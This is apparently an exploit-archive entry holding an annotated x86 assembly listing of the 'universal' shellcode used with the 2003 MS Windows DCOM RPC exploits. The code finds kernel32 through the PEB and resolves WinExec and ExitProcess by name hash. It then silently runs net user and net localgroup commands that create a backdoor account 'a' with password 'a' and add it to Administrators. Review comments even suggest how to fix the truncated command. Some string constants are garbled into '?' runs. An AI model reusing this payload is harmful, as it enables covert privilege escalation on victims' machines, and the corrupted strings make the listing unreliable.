
MS Windows (DCOM RPC2) Universal Shellcode

🗓️ 09 Oct 2003 00:00:00 · Reported by: n/a · Type: zdt

This is the 32-bit x86 payload used with the MS Windows DCOM RPC exploits: it locates the kernel32 image base through the PEB loader lists, resolves WinExec and ExitProcess by a ROR-13 hash of their export names, then runs a series of `net user` / `net localgroup` commands through WinExec that create a local account named "a" (password "a") and add it to an administrators group, and finally calls ExitProcess. Note that the listing as archived contains three-character string constants and runs of `?` that do not reproduce the original command strings exactly (see the review notes in the code).

Code
==========================================
MS Windows (DCOM RPC2) Universal Shellcode 
==========================================





; Segment type:	Pure code
;seg000		segment	byte public 'CODE' use32
;		assume cs:seg000
;		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
; 32-bit x86, Intel/MASM syntax, recovered from an IDA disassembly (the four
; commented lines above are IDA's original segment header). Flat 32-bit
; Windows code; no START address is declared, control arrives at
; beginofpackeddata from a decoder that is not part of this listing (see the
; UnXORFunc cross-references left in the comments).
.386
assume cs:seg000			; NOTE(review): names seg000 before its SEGMENT directive below -- confirm the assembler used accepts this forward reference
; Frame equates carried over from the dump. Nothing in this listing
; references them; the live scratch table is addressed through esi instead.
var_29C		= byte ptr -29Ch
var_28C		= byte ptr -28Ch
var_25F		= byte ptr -25Fh
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch

seg000		segment	byte public 'CODE' use32

beginofpackeddata:			; CODE XREF: UnXORFunc+17j
; Entry point of the decoded payload. The XREF names (UnXORFunc, sub_76) are
; left over from the IDA dump this listing was produced from; the decoder
; itself is not shown here.
;
; esi is pointed at a scratch table carved out of the stack:
;   [esi]      kernel32 image base          (returned by sub_191)
;   [esi+0Ch]  WinExec address              (resolved by hash 0E8AFE98h)
;   [esi+10h]  ExitProcess address          (resolved by hash 73E2D87Eh)
;
; Each command line is built on the stack by pushing it in 4-byte chunks,
; last chunk first. MASM stores a multi-character constant with its first
; character in the most significant byte, so every chunk appears reversed in
; the source: ' ten' pushes the bytes "net ".
;
; NOTE(review): a three-character constant such as 'a s' assembles to a dword
; whose top byte is zero, so it pushes "s a" followed by a NUL; that NUL ends
; the command line before the " /add" chunk pushed just before it. This
; affects the second, third and fourth commands below. The '?' runs in the
; second and third command look like characters the archive could not render,
; so confirm all four strings against the original bytes before relying on
; this listing.
		push	ebp
		mov	ebp, esp
		sub	esp, 80h		; reserve the scratch table
		mov	esi, esp		; esi -> table
		call	sub_191			; eax = kernel32 base
						; NOTE(review): sub_191 ends with retn 4 although nothing
						; was pushed for it, so esp now sits 4 bytes above esi;
						; the code still works because [esi] is stored explicitly
						; below and the payload never returns.
		push eax			; keep the base across the PEB write
		mov	eax, fs:18h		; fs:[18h] = TEB self pointer (NT family)
		mov	eax, [eax+30h]		; TEB+30h -> PEB
		lea	eax, [eax+18h]		; PEB+18h (ProcessHeap in the NT PEB)
		mov	ebx, 190000h
		mov	[eax], ebx		; NOTE(review): stores a fixed 0x190000 into PEB+18h; presumably
						; meant to give the process a usable heap handle after the
						; overflow -- the listing does not say, confirm before reuse
		pop  eax
		mov	[esi], eax		; [esi] = kernel32 base
		push	dword ptr [esi]		; arg 2: image base
		push	0E8AFE98h		; arg 1: hash of the export name (WinExec per the original comment)
		call	GetFunctionBYName ;WinExec
		mov	[esi+0Ch], eax		; [esi+0Ch] = WinExec
						; NOTE(review): GetFunctionBYName returns 0 on a miss and
						; nothing here checks for it; a miss ends in a call to 0.
		push	dword ptr [esi]		; arg 2: image base (the previous one is still on the stack; retn 4 only pops the hash)
		push 	73e2d87eh		; arg 1: hash of the export name (ExitProcess per the original comment)
		call	GetFunctionBYName ;ExitProcess
		mov	[esi+10h], eax		; [esi+10h] = ExitProcess

; -- "net user a a /add": create local user "a" with password "a"
		xor	eax, eax
		push	eax			; NUL terminator
		push	'd'			; "d"
		push	'da/ '			; " /ad"
		push	'a a '			; " a a"
		push	'resu'			; "user"
		push	' ten'			; "net "
		mov	ecx, esp		; ecx -> command line
		push	eax			; uCmdShow = 0 (SW_HIDE)
		push	ecx			; lpCmdLine
		call	dword ptr [esi+0Ch]	; WinExec; stdcall, pops its two args; the string bytes stay on the stack

; -- "net localgroup ?...? a /add": add "a" to a group whose name the archive
;    shows as '?' characters (presumably a localized group name, given the
;    Administrators variant further down).
;    NOTE(review): 'a ?' is three characters, so as listed the line ends in a
;    NUL right after "a" and the " /add" that follows is not part of it.
		xor	eax, eax
		push	eax			; NUL terminator
		push	'd'			; "d"
		push	'da/ '			; " /ad"
		push	'a ?'			; "? a" + NUL (three-character constant)
		push	'????'
		push	'????'
		push	'????'
		push	'? pu'			; "up ?"
		push	'orgl'			; "lgro"
		push	'acol'			; "loca"
		push	' ten'			; "net "
		mov	ecx, esp		; ecx -> command line
		push	eax			; uCmdShow = 0 (SW_HIDE)
		push	ecx			; lpCmdLine
		call	dword ptr [esi+0Ch]	; WinExec

; -- second localized "net localgroup ... a /add" variant.
;    NOTE(review): '???' , '?? ' and 'a ?' are three characters each, so as
;    listed the line is cut by a NUL well before " a /add".
		xor	eax, eax
		push	eax			; NUL terminator
		push	'd'			; "d"
		push	'da/ '			; " /ad"
		push	'a ?'			; "? a" + NUL
		push	'?? '			; " ??" + NUL
		push	'???'			; "???" + NUL
		push	'????'
		push	'? pu'			; "up ?"
		push	'orgl'			; "lgro"
		push	'acol'			; "loca"
		push	' ten'			; "net "
		mov	ecx, esp		; ecx -> command line
		push	eax			; uCmdShow = 0 (SW_HIDE)
		push	ecx			; lpCmdLine
		call	dword ptr [esi+0Ch]	; WinExec
				
; -- "net localgroup Administrators a /add": add "a" to Administrators
;    NOTE(review): 'a s' is three characters ("s a" + NUL), so as listed the
;    command line ends at "...Administrators a" and net.exe never sees /add.
;    Pushing ' a s' then 'dda/' (in place of 'a s', 'da/ ', 'd') would carry
;    the full "net localgroup Administrators a /add"; verify with the
;    assembler that was actually used.
		xor	eax, eax
		push	eax			; NUL terminator
		push	'd'			; "d"
		push	'da/ '			; " /ad"
		push	'a s'			; "s a" + NUL (three-character constant)
		push	'rota'			; "ator"
		push	'rtsi'			; "istr"
		push	'nimd'			; "dmin"
		push	'A pu'			; "up A"
		push	'orgl'			; "lgro"
		push	'acol'			; "loca"
		push	' ten'			; "net "
		mov	ecx, esp		; ecx -> command line
		push	eax			; uCmdShow = 0 (SW_HIDE)
		push	ecx			; lpCmdLine
		call	dword ptr [esi+0Ch]	; WinExec

		push	0h			; uExitCode = 0
		call	dword ptr [esi+10h] ; ExitProcess(0) -- does not return
;		end

; ??????????????? S U B	R O U T	I N E ???????????????????????????????????????


GetFunctionBYName proc near		; CODE XREF: UnXORFunc+31p
					; UnXORFunc+40p ...
; Look up an export of a PE image already mapped in memory by a 32-bit hash
; of its name.
;   in:   [esp+4]  hash          (arg_0; popped by retn 4)
;         [esp+8]  image base    (arg_4; left on the stack for the caller)
;   out:  eax = address of the export, or 0 if no name hashes to the value
;         edx = image base (set on both paths)
;   saves ebx/ebp/esi/edi; clobbers eax, ecx, edx, flags; leaves DF = 0
; Hash: h = 0; for each byte b of the name up to the NUL: h = ror(h, 13) + b.
; The name table is scanned from its last entry down to index 0, so when two
; names collide on the hash the entry with the higher index wins.
; Offsets are the standard PE32 layout: base+3Ch = e_lfanew, PE+78h = export
; directory RVA; export directory +18h NumberOfNames, +1Ch AddressOfFunctions,
; +20h AddressOfNames, +24h AddressOfNameOrdinals.
; NOTE(review): callers receive 0 on a miss and must check for it. There is no
; forwarder check, so a forwarded export would come back as a pointer into the
; export section rather than code.

arg_0		= dword	ptr  14h		; 4 saved registers + return address = 14h
arg_4		= dword	ptr  18h

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, [esp+arg_4]	; ebp = image base
		mov	eax, [ebp+3Ch]		; e_lfanew
		mov	edx, [ebp+eax+78h]	; export directory RVA
		add	edx, ebp		; edx -> IMAGE_EXPORT_DIRECTORY
		mov	ecx, [edx+18h]		; NumberOfNames (loop counter / index)
		mov	ebx, [edx+20h]		; AddressOfNames RVA
		add	ebx, ebp		; ebx -> table of name RVAs

loc_1B2:				; CODE XREF: GetFunctionBYName+36j
		jecxz	short loc_1E6		; no names left -> not found
		dec	ecx			; ecx = index of the name to test
		mov	esi, [ebx+ecx*4]
		add	esi, ebp		; esi -> NUL-terminated name
		xor	edi, edi		; edi = running hash
		cld				; lodsb walks forward

loc_1BD:				; CODE XREF: GetFunctionBYName+30j
		xor	eax, eax		; ah = 0 for the terminator test below
		lodsb
		cmp	al, ah			; end of name?
		jz	short loc_1CB
		ror	edi, 0Dh
		add	edi, eax
		jmp	short loc_1BD
; ???????????????????????????????????????????????????????????????????????????

loc_1CB:				; CODE XREF: GetFunctionBYName+29j
		cmp	edi, [esp+arg_0]	; hash matches the one requested?
		jnz	short loc_1B2		; no -> try the next lower index
		mov	ebx, [edx+24h]		; AddressOfNameOrdinals RVA
		add	ebx, ebp
		mov	cx, [ebx+ecx*2]		; cx = ordinal; only the low 16 bits are replaced,
						; which is fine as long as the name index fit in 16 bits
		mov	ebx, [edx+1Ch]		; AddressOfFunctions RVA
		add	ebx, ebp
		mov	eax, [ebx+ecx*4]	; function RVA
		add	eax, ebp		; eax = function VA
		jmp	short loc_1E8
; ???????????????????????????????????????????????????????????????????????????

loc_1E6:				; CODE XREF: GetFunctionBYName+19j
		xor	eax, eax		; not found

loc_1E8:				; CODE XREF: GetFunctionBYName+4Bj
		mov	edx, ebp		; edx = image base
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	4			; pops the hash only; the base stays on the stack
GetFunctionBYName endp

sub_191		proc near		; CODE XREF: sub_76+Bp
; Find the base of the module the caller resolves WinExec/ExitProcess from,
; i.e. kernel32.dll, through the PEB loader data.
;   in:   nothing on the stack (see the note on retn 4 below)
;   out:  eax = module base; saves esi/ebp; clobbers flags
; Normal path: fs:[30h] -> PEB, PEB+0Ch -> PEB_LDR_DATA, +1Ch ->
; InInitializationOrderModuleList.Flink (first entry); lodsd follows that
; entry's Flink to the second entry, and +8 from an InInitializationOrder
; link is the entry's DllBase (standard LDR_DATA_TABLE_ENTRY layout). On the
; NT releases current for this listing the second entry is kernel32.dll.
; NOTE(review): this list order is known to differ on later Windows releases,
; so the resolver is version-dependent; confirm on the target.
; Fallback path: taken when fs:[30h] has the sign bit set -- presumably the
; Windows 9x/Me layout, where fs:[30h] is not a PEB pointer. The 34h/0B8h
; offsets used there are undocumented in this listing; confirm before reuse.
; NOTE(review): retn 4 discards 4 bytes of the caller's stack although the
; only call site (beginofpackeddata) pushes no argument; a plain retn would
; match the call. The label loc_1B2 is also defined in GetFunctionBYName --
; that only assembles because MASM scopes plain labels to their PROC.
		push	ebp
		push	esi
		mov	eax, fs:30h		; PEB on NT; something else with the sign bit set on the fallback path
		test	eax, eax
		js	short loc_1A9		; sign bit set -> alternate layout
		mov	eax, [eax+0Ch]		; PEB->Ldr
		mov	esi, [eax+1Ch]		; Ldr->InInitializationOrderModuleList.Flink
		lodsd				; eax = second entry's link (esi is not used afterwards)
		mov	ebp, [eax+8]		; DllBase of that entry
		jmp	short loc_1B2
; ???????????????????????????????????????????????????????????????????????????

loc_1A9:				; CODE XREF: sub_191+Aj
		mov	eax, [eax+34h]
		mov	ebp, [eax+0B8h]		; assumed module base on this path -- undocumented here

loc_1B2:				; CODE XREF: sub_191+16j
		mov	eax, ebp		; return value
		pop	esi
		pop	ebp
		retn	4			; NOTE(review): see header -- nothing was pushed for this
sub_191 endp
; ???????????????????????????????????????????????????????????????????????????

seg000		ends

end					; no start address: control enters at beginofpackeddata from the (unlisted) decoder

; 


